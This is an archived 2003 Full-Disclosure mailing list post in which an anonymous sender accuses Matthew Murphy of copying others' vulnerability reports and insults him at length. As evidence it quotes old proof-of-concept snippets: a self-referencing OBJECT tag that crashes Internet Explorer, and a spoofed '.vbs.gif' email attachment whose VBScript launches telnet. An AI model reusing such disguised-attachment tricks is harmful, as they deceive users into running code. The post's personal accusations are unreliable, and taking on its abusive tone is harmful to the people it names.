lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200307160045.h6G0jfQh066366@mailserver1.hushmail.com>
From: dhtml at hush.com (dhtml@...h.com)
Subject: GUNINSKI THE SELF-PROMOTER

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


>
> You may remember that Guninski completely failed to notify the VIM
> development team of security vulnerabilities in its product, and these
were
> brought up by a third party on VIM-DEV for the first time.  I would
have
> understood CC'ing the major security lists with the post *in addition
to*
> vim-dev, as it *is* a public channel.

I certainly don't remember that. Seems Georgi  said:

" Vendor status: vim.org and some vendors were notified on Mon, 25 Nov
2002"

After releasing it on Thu, 12 Dec 2002. I think I will believe Georgi's
version. Not
yours.



>
> After all, Guninski has not produced an advisory detailing a security
> vulnerability of any kind in a Microsoft product since July 31, 2002,
 so
> what right does he have to say that trustworthy computing is a flop?

> Clearly, Georgi Guninski couldn't get a job, and relying on the Apache
1.3
> descriptor leak (shudders), or perhaps a local command execution bug
in
> vim, or worse, a format string in the Etheral socks dissector, wouldn't
get
> him anywhere.  So, he has slanted every story he could get a hold of,

> turning a non-issue of one-month delays into ridiculous, childish,
kiddies'
> rhetoric about MS' irresponsibility.  Even funnier is that while he
was
> making a major deal out of MS security being unresponsive, he wasn't
even
> notifying open-source vendors of security vulnerabilities!


Your transparent and sudden "love affair" with Microsoft and "responsible
disclosure"
doesn't fool us Matthew.  It is you that is desperately seeking employment
and the louder
you shout, the better chances you think you may have. Oh Matthew. You
turncoat you.


> Also, Bruce Schneier has little or no room to talk, as his "Password
Safe"
> tool was unable to keep local passwords safe, let alone a large product
> base of network applications:

Please. You're embarrassing yourself. Matthew Murphy, wannabe virus writer.
Why not
skip on back to alt.comp.virus.source.code to try and figure it all out
before taking on
Schneier. Matthew, Matthew, Matthew you'd spin around like a little girl
in the vortex of his
knowledge should he even fart in your direction.

HAHAHAHA  sig of the year:

"Bruce Schneier has little or no room to talk"
- - MATTHEW MURPHY - CODE RIPPER, JULY 15 2003



> I also ask you to take into account the fact that altering a mindset
takes
> time.  Security vulnerabilities were all but ignored in the early days
of
> single-user non-networked Win16.  Those early days are the source of
some
> of the Win32 message routines implicated in the recent "Shatter" attacks.
>
> Microsoft has had to work against buggy base code, and teams of developers
> who were never taught a bit about security.  Essentially, Microsoft
is
> working against its own history.  For a company of Microsoft's size,
 this
> is not easy.  For all of the work that requires, I'd say that Microsoft
is
> doing a damn good job.


Keep it up Matthew, they'll come a recruiting soon enough.

For shits and giggles here are two of Matthew "Bruce Schneier has little
or no room to talk" Murphy's code rips:

1. DoS in Multiple IE Versions (Self-Referenced Directives) Date: 2002-
04-20

"The Exploit

    To date, I have discovered 4 points of exploitation to crash the
browser.  My favorite example is this one:

- ---- [ CRASH.HTM ] ----
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
- ---- [ CRASH.HTM ] ----

IE dies inside shdocvw.dll with a call stack overflow.
"

Gosh, this was discovered in March 1998 by Abe L. Getchell. Even the
named html is almost the same LoL!

<!--
<html>
<head>
<title></title>
<object data=3D"crashmehtml.html"></object>
</head>
<body>
</body>
</html>
- -->

"What I am doing here, is using the "data" attribute of the"object" tag
to reference itself.
This misuse of the object tag causesthe broswer to go into a loop"

"EXPLORER causes a stack fault in module SHDOCVW.DLL at 016f:7078d692.
  EXPLORER causes a page fault in module SHDOCVW.DLL at 016f:7078d692"

2. Microsoft Outlook Express Spoofable File Extensions Vulnerability
http://www.securityfocus.com/bid/5277 published Jul 20, 2002

You "pinched" ;-) that one from virus writer, Simon Vallor, Outlook GenKit:

    "malware.JPG              .EXE                  .JPG"

Problem there is, Simon pinched it from bugtraq already in the archives
back in  August, 2001 which is what is generator was created for.

http://www.securityfocus.com/archive/1/157279/2003-07-13/2003-07-19/2

Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="nicepic.gif






                                .vbs.gif"

set WshShell = WScript.CreateObject
("WScript.Shell")
WshShell.Run("telnet.exe")

Lord alone knows what else you have been helping yourself to Matthew.
No worries there mate, you'll fit in well with Microsoft once they come
a calling

Are you still 14? Seems like ages. But you'll hopefully grow up one day.

Cheers Big Ears! :D

Oh. and p.s. - feel free to help yourself to anything else you might
fancy. "Pad" the resume for Microsoft you see ;-)

!
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj8UnzAACgkQTAj0ZSCgbx5aAgCfTxVa5fKzBRwMliaKrWvWRg5sfY0A
oLtuDFGTg8jpcESfykFCLw3jYXDL
=wByl
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ